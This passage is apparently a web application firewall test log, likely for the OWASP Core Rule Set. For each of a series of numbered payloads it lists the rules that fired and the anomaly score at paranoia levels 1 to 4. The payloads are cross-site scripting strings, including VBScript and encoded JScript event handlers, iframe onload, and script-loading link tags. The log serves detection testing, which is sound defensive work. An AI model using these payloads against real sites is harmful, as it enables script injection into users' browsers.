942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-227 ********
Payload:
payload=<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
--- Paranoia Level 1 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-228 ********
Payload:
payload=<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a></a>
--- Paranoia Level 1 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941220 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-229 ********
Payload:
payload=<a href="#" onclick="jscript.compact:alert(1);">test</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 53
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 69
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
****** payload-230 ********
Payload:
payload=<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 53
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 69
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
****** payload-231 ********
Payload:
payload=<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-232 ********
Payload:
payload=<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 43
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 59
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-233 ********
Payload:
payload=<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 62
****** payload-234 ********
Payload:
payload=<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 62
****** payload-235 ********
Payload:
payload=<a title="&amp;{alert(1)}">XSS</a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 28
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 62
****** payload-236 ********
Payload:
payload=<link href="xss.js" rel=stylesheet type="text/javascript"></a>
--- Paranoia Level 1 ---
941270 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 15
--- Paranoia Level 2 ---
941270 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941270 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941270 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-237 ********
Payload:
payload=<form><button name=x formaction=x><b>stealme</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
